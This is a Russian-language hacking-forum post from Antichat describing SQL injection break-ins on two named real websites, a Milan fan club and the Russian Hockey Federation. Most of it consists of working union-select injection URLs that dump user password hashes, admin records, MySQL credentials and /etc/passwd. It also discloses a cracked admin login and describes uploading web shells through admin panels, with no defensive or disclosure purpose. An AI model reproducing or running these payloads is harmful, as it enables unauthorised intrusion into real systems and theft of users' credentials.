Форум АНТИЧАТ - Футбол + Хоккей

Рассмотренны несколько стандартных уязвимостей на интересных и живых сайтах, на которых тусуется народ, а админы не заботятся о безопасности, или заботятся но не до конца...

Начнем, собственно, с футбола, итак, взглянем на сайт оффициального фан-клуба гранда мирового футбола, команды Милан..

www.acmilanfan.ru

немного поизучав сайт и подставляя к параметрам символ ' на предмет иньекции, можно заметить, что места для внедрения существуют, и не в едином количестве. Вобщем, выбираем любой бажный скрипт и действуем:

Цитата:

http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,member_login_key,email,leg acy_password),5,6

быстро глядим на версию - она четвертая, и стандартных таблиц типа users не предвидется, но не будем о грустном.. Ведь на сайте стоит форум IPB 2.0.4, но, к сожалению, стандартный префикс ibf_ подходить отказывается. Немного пораскинув мозгами, обнаруживаем, что префикс у базы форума - ipb_, и сразу просматриваем таблицу ipb_members

Цитата:

http://www.acmilanfan.ru/guestbook.php?section=1+and+1=0+union+select+1,2,3 ,concat_ws(0x3a,id,name,email,legacy_password),5,6 +from+ipb_members/*

итак, мы имеем хеши пользователей форума.
Строго говоря, в форумах IPB 2+ хеши соленые и хранятся в таблице members_converge в полях converge_pass_hash (хеш) и converge_pass_salt (соль), а в поле legacy_password хранятся не соленые хеши, но далеко не всегда, в даннам случае нам повезло. А повезло потому, что хеш одного из админов из-за своей простоты сбручивается и зайдя в админку стандартными средствами, через смайлы, заливается шелл...

И рассмотрим еще один примерчик, имеющий отношение к анонсированному раннее хоккею -

www.fhr.ru

как видно из названия - это Федерация хоккея России, индекс pr у сайта довольно высокий - 5. на сайте есть куча разделов, форум, а обратясь www.domainsdb.net видно, что вместе с fhr.ru хостятся другие сайты sportsrussia.ru, volley.ru, photosport.ru, vancouver-2010.ru и некоторые другие.

Итак, погуляв по сайту находим, куда нам запустить свои шаловливые ручонки. А вынув руки видим что версия mysql на сайте пятая, глядим таблицы:

Цитата:

http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,table_name), 4,5,6,7,8,9,0,1+from+information_schema.tables+lim it+19,1/*

форум на сайте - phpbb, со стандартым префиксом - phpbb_, смотрим админские записи в таблице phpbb_users

Цитата:

http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user_id,user name,user_password,user_level),4,5,6,7,8,9,0,1+fro m+phpbb_users+where+user_level=1+limit+0,1/*

опять таки один из трех админов имеет достаточно тривиальный пароль - Max:metallica. А значит доступ в админку у нас есть! идем туда и заливаем шелл одним из способов, которые приводил k1b0rg, благо он все расписал подробно.

По этому сайту остается только добавить что доступ к таблице mysql также присутствует:

Цитата:

http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,concat_ws(0x3a,user,passwor d),4,5,6,7,8,9,0,1+from+mysql.user/*

А также вовсю открыт читальный зал:

Цитата:

http://www.fhr.ru/new_news/index.php?id=-1019'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,0,1/*

То есть мы имеем полный джентельменский набор :)

спасибо за внимание, целую ваши мысли :D

/PS/ Вперед на Россия-Польша!